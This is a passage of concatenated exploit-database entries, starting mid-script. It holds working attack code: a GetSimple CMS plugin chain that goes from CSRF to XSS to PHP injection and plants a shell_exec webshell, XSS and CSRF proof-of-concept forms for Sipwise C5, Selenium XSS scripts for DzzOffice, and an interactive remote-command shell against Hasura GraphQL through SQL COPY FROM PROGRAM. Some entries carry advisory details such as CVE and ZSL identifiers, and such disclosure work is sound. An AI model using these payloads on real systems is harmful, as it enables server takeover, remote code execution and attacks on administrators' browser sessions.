'xhr2.open(\\x22POST\\x22,u,true);' payload += 'xhr2.setRequestHeader(\\x22Content-Type\\x22,h);' # for the $_REQUEST[solarflare] used for the webshell via shell_exec(), hex-escape the $ or else it will render in the PHP engine to early in the exploit chain payload += 'payload=e(\\x22\\x3c?php echo shell_exec(\\x24_REQUEST[solarflare]) ?\\x3e\\x22);' payload += 'params=\\x22nonce=\\x22+nVal+\\x22\\x26content=\\x22+payload+\\x22\\x26edited_file=\\x22+eVal+\\x22\\x26submitsave=Save+Changes\\x22;' payload += 'xhr2.send(params);' payload += '}};' payload += 'xhr1.open(\\x22GET\\x22,u,true);' payload += 'xhr1.responseType=\\x22document\\x22;' payload += 'xhr1.send();' hexBreakoutClose = '\\x3c/script\\x3e' return hexBreakoutOpen + payload + hexBreakoutClose def csrfPayload(): payload = '<body><form action="'+target+'/admin/load.php?id=my-smtp-contact" method="POST">' payload += '<input type="hidden" name="act" value="addsettings">' payload += '<input type="hidden" name="m_smtp_c_language" value="en.php">' payload += '<input type="hidden" name="m_smtp_c_sender_name" value="'+xhrRcePayload()+'">' payload += '<input type="hidden" name="my_smtp_c_selected_dir" value="395ed33a5ae4476">' payload += '<input type="submit" value="Submit request">' payload += '</form><body>' return payload class S(BaseHTTPRequestHandler): def do_GET(self): victim = self.client_address victim = "{}:{}".format(victim[0],victim[1]) print("{} connected to Malicious CSRF Site!".format(victim)) self.wfile.write("{}".format(csrfPayload()).encode('utf-8')) def run(server_class=HTTPServer, handler_class=S, port=80): server_address = ('', port) httpd = server_class(server_address, handler_class) print('{}Hosting CSRF attack & listening for admin to connect..'.format(info)) try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() print('Stopping httpd...') def tryUploadWebshell(target,page): try: blind = target+page # The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt) webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"} requests.post(url=blind, data=webshUpload, verify=False) except: pass def checkWebshell(target): try: websh = "{}/webshell.php".format(target) capsule = {'FierceGodKick':'pwnt?'} resp = requests.post(url=websh, data=capsule, verify=False) return resp.status_code except: pass def sig(): SIG = SB+FY+" .-----.._ ,--.\n" SIG += FY+" | .. > ___ | | .--.\n" SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __\n" SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\\n" SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\\n" SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\\n" SIG += FY+" _______"+FR+"github.com/boku7"+FY+"_____\n"+ST return SIG def argsetup(): about = SB+FB+' The My SMTP Contact v1.1.2 plugin for GetSimple CMS suffers from a Stored Cross-Site Scripting (XSS) vulnerability, that when chained together with the CSRF vulnerability in v1.1.1, allows remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter) desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB parser.add_argument('Target',type=str,help=desc1) desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST parser.add_argument('PublicPage',type=str,help=desc2) args = parser.parse_args() return args if __name__ == '__main__': header = SB+FR+' My SMTP Contact GetSimple CMS Plugin\n' header += SB+FM+'CSRF '+FT+'-->'+FM+' Stored XSS '+FT+'-->'+FM+' XHR PHP Code Injection '+FT+'-->'+FM+' RCE\n'+ST header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke\n'+ST print(header) args = argsetup() target = args.Target page = args.PublicPage print(sig()) theTHREADER() pwnt = checkWebshell(target) if pwnt != 200: while pwnt != 200: sleep(3) tryUploadWebshell(target,page) sleep(2) pwnt = checkWebshell(target) print("{} A wild webshell appears!".format(ok)) webshell(target)

# Exploit Title: Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS) # Date: 13.04.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.sipwise.com Sipwise C5 NGCP CSC Multiple Stored/Reflected XSS Vulnerabilities Vendor: Sipwise GmbH Product web page: https://www.sipwise.com Affected version: <=CE_m39.3.1 NGCP www_admin version 3.6.7 Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform) is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail, conferencing etc.) that can be configured by end users in the self-care web interface. For operators, it offers a web-based administrative panel that allows them to configure subscribers, SIP peerings, billing profiles, and other entities. The administrative web panel also shows the real-time statistics for the whole system. For tight integration into existing infrastructures, Sipwise C5 provides a powerful REST API interface. Desc: Sipwise software platform suffers from multiple authenticated stored and reflected cross-site scripting vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache/2.2.22 (Debian) Apache/2.2.16 (Debian) nginx Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5648 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5648.php 13.04.2021 -- Stored XSS (POST tsetname): --------------------------- <html> <body> <form action="https://10.0.1.7/callforward/time/set/save" method="POST"> <input type="hidden" name="tsetname" value=""><script>confirm&#40;251&#41;<&#47;script>" /> <input type="hidden" name="subscriber&#95;id" value="401" /> <input type="hidden" name="x" value="90027" /> <input type="hidden" name="y" value="&#45;1" /> <input type="submit" value="Go for callforward" /> </form> </body> </html> Reflected XSS (GET filter): --------------------------- <html> <body> <form action="https://10.0.1.7/addressbook" method="GET"> <input type="hidden" name="filter" value='"><script>confirm(251)</script>' /> <input type="hidden" name="x" value="0" /> <input type="hidden" name="y" value="0" /> <input type="submit" value="Go for addressbook" /> </form> </body> </html> Stored XSS (POST firstname, lastname, company): ----------------------------------------------- <html> <body> <form action="https://10.0.1.7/addressbook/save" method="POST"> <input type="hidden" name="firstname" value='"><script>alert(251)</script>' /> <input type="hidden" name="lastname" value='"><script>alert(251)</script>' /> <input type="hidden" name="company" value='"><script>alert(251)</script>' /> <input type="hidden" name="homephonenumber" value="1112223333" /> <input type="hidden" name="phonenumber" value="3332221111" /> <input type="hidden" name="mobilenumber" value="" /> <input type="hidden" name="faxnumber" value="" /> <input type="hidden" name="email" value="lab%40zeroscience.mk" /> <input type="hidden" name="homepage" value="" /> <input type="hidden" name="id" value="" /> <input type="hidden" name="x" value="89957" /> <input type="hidden" name="y" value="21" /> <input type="submit" value="Go for addressbook 2" /> </form> </body> </html> Reflected XSS (GET lang): ------------------------- <html> <body> <form action="https://10.0.1.7/statistics/versions" method="GET"> <input type="hidden" name="lang" value="en'-alert(251)-'ZSL" /> <input type="submit" value="Go for statistics" /> </form> </body> </html>

# Exploit Title: DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS) # Author: @nu11secur1ty # Testing and Debugging: @nu11secur1ty, g3ck0dr1v3r # Date: 04/23/2021 # Vendor: http://www.dzzoffice.com/ # Link: https://github.com/zyx0814/dzzoffice # CVE: CVE-2021-3318 [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # CVE-2021-3318 from selenium import webdriver import time import os #enter the link to the website you want to automate login. website_link="http://localhost/dzzoffice/user.php?mod=login" #enter your login username username="[email protected]" #enter your login password password="password" #enter the element for username input field element_for_username="email" #enter the element for password input field element_for_password="password" #enter the element for submit button element_for_submit="loginsubmit" # Dai brauzura aaa ta eba browser = webdriver.Chrome() #uncomment this line,for chrome users # Otvarai da ne vlazam s kasata browser.get((website_link)) # Run... try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) ### Login signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() ### Exploit #time.sleep(3) element_for_natrutvanie="admin_password" laina="http://localhost/dzzoffice/admin.php?mod=appmarket&op=cloudappmarket" browser.get((laina)) ### Next level... :) os.system("python poc_login_1.py") print("payload is deployed_0...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(") ### os.system #!/usr/bin/python3 # Author: @nu11secur1ty # CVE-2021-3318 from selenium import webdriver import time #enter the link to the website you want to automate login. website_link="http://localhost/dzzoffice/admin.php?mod=setting" #enter your login username username="[email protected]" #enter your login password password="password" #enter the element for username input field element_for_username="admin_email" #enter the element for password input field element_for_password="admin_password" #enter the element for submit button element_for_submit="submit" # Dai brauzura aaa ta eba browser = webdriver.Chrome() #uncomment this line,for chrome users # Otvarai da ne vlazam s kasata browser.get((website_link)) # Run... try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) ### Login signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() ### Exploit time.sleep(3) element_for_natrutvanie="settingsubmit" laina="http://localhost/dzzoffice/admin.php?mod=setting" browser.get((laina)) ### Inner text... browser.execute_script("document.querySelector('[name=\"settingnew[metakeywords]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'") browser.execute_script("document.querySelector('[name=\"settingnew[sitebeian]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'") browser.execute_script("document.querySelector('[name=\"settingnew[metadescription]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'") browser.execute_script("document.querySelector('[name=\"settingnew[statcode]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'") time.sleep(5) # Submit exploit signInButton = browser.find_element_by_name(element_for_natrutvanie) signInButton.click() print("payload is deployed_1...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(")

# Exploit Title: Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF) # Date: 13.04.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.sipwise.com Sipwise C5 NGCP CSC CSRF Click2Dial Exploit Vendor: Sipwise GmbH Product web page: https://www.sipwise.com Affected version: <=CE_m39.3.1 NGCP www_admin version 3.6.7 Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform) is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail, conferencing etc.) that can be configured by end users in the self-care web interface. For operators, it offers a web-based administrative panel that allows them to configure subscribers, SIP peerings, billing profiles, and other entities. The administrative web panel also shows the real-time statistics for the whole system. For tight integration into existing infrastructures, Sipwise C5 provides a powerful REST API interface. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Apache/2.2.22 (Debian) Apache/2.2.16 (Debian) nginx Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5649 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5649.php 13.04.2021 -- <html> <body> <form action="https://10.0.1.7/call/click2dial" method="POST"> <input type="hidden" name="d" value="%2B3897031337" /> <input type="submit" value="Dial and charge!" /> </form> </body> </html>

# Exploit Title: Hasura GraphQL 1.3.3 - Remote Code Execution # Software: Hasura GraphQL # Software Link: https://github.com/hasura/graphql-engine # Version: 1.3.3 # Exploit Author: Dolev Farhi # Date: 4/23/2021 # Tested on: Ubuntu import requests import sys HASURA_SCHEME = 'http' HASURA_HOST = '192.34.57.144' HASURA_PORT = 80 print('Start typing shell commands...') while True: cmd = input('cmd $> ') data = { "type":"bulk", "args":[ { "type":"run_sql", "args":{ "sql":"SET LOCAL statement_timeout = 10000;","cascade":False,"read_only":False} }, { "type":"run_sql", "args":{ "sql":"DROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM '" + cmd + "';\nSELECT * FROM cmd_exec;","cascade":False,"read_only":False} } ] } endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) r = requests.post(endpoint, json=data) if r.ok: try: for i in r.json()[1]['result']: print(''.join(i)) except: print(r.json())